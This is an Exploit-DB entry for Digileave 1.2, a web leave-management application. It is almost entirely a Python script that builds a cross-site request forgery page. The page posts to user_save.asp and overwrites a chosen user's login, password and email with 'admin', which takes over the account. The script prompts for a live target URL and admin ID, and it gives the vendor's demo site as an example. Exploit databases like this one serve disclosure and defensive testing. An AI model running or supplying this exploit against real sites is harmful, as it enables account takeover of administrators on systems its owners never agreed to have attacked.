Digileave 1.2 – Cross-Site Request Forgery (Update Admin)

  • 作者: Ihsan Sencan
    日期: 2017-09-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42737/
  • #!/usr/local/bin/python
    # # # # # 
    # Exploit Title: Digileave 1.2 - Cross-Site Request Forgery (Update User & Admin)
    # Dork: N/A
    # Date: 18.09.2017
    # Vendor Homepage: http://www.digiappz.com/
    # Software Link: http://www.digiappz.com/digileave.asp?id=1
    # Demo: http://www.digiappz.com/digileave/login.asp
    # Version: 1.2
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    import os
    import urllib
    
    if os.name == 'nt':
    		os.system('cls')
    else:
    	os.system('clear')
    
    def csrfexploit():
    
    	e_baslik = '''
    ################################################################################
    _____________ ____ __ _____ _______ ____________ __ 
     /_/ / / / ___// |/ | / // ___// ____/ | / / ____/ |/ | / / 
     / // /_/ /\__ \/ /| | /|/ / \__ \/ __/ /|/ / / / /| | /|/ /
     _/ // __/___/ / ___ |/ /|/ ___/ / /___/ /|/ /___/ ___ |/ /|/
    /___/_/ /_//____/_/|_/_/ |_/ /____/_____/_/ |_/\____/_/|_/_/ |_/
    
     WWW.IHSAN.NET 
     ihsan[@]ihsan.net 
     + 
    Digileave 1.2 - CSRF (Update Admin) 
    ################################################################################
    
    
    	'''
    	print e_baslik
    
    	url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digileave: "))
    	id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8511): ")
    	
    	csrfhtmlcode = '''
    <html>
    <body>
    <form method="POST" action="%s/user_save.asp" name="user">
    <table border="0" align="center">
    <tbody><tr>
    <td valign="middle">
    
    <table border="0" align="center">
    <tbody><tr>
    	<td bgcolor="gray" align="center">
    	<table width="400" cellspacing="1" cellpadding="2" border="0">
    			<tbody><tr>
    				<td colspan="2" bgcolor="cream" align="left">
    					<font color="red">User Update</font>
    				</td>
    			</tr>
    	<tr>
    	<td>
    					<font><b>Choose Login*</b></font>
    				</td>
    				<td>
    		<input name="login" size="30" value="admin" type="text">
    				</td>
    			</tr>
    	<tr>
    	<td>
    					<font><b>Choose Password*</b></font>
    				</td>
    				<td>
    		<input name="password" size="30" value="admin" type="text">
    				</td>
    			</tr>
    	<tr>
    	<td>
    					<font><b>First Name*</b></font>
    				</td>
    				<td>
    		<input name="first_name" size="30" value="admin" type="text">
    				</td>
    			</tr>
    	<tr>
    	<td>
    					<font><b>Last Name*</b></font>
    				</td>
    				<td>
    		<input name="last_name" size="30" value="admin" type="text">
    				</td>
    			</tr>
    	<tr>
    	<td>
    					<font><b>Email*</b></font>
    				</td>
    				<td>
    		<input name="email" size="30" value="admin@admin.com" onblur="emailvalid(this);" type="text">
    				</td>
    			</tr>
    			<tr>
    				<td colspan="2" align="center">
    					<input name="id" value="%s" type="hidden">
    					<input value="Update" onclick="return check()" type="submit">
    				</td>
    			</tr>
    		 </tbody></table>
    	</td>
    	</tr>
    </tbody></table>
    	 </td>
    </tr>
    </tbody></table>
    </form>
    	''' %(url, id)
    
    	print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
    
    	print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
    	extension = ".html"
    	name = raw_input(" Filename: ")
    	filename = name+extension
    	file = open(filename, "w")
    
    	file.write(csrfhtmlcode)
    	file.close()
    	print(" [+] Your exploit is saved as %s")%filename
    	print("")
    
    csrfexploit()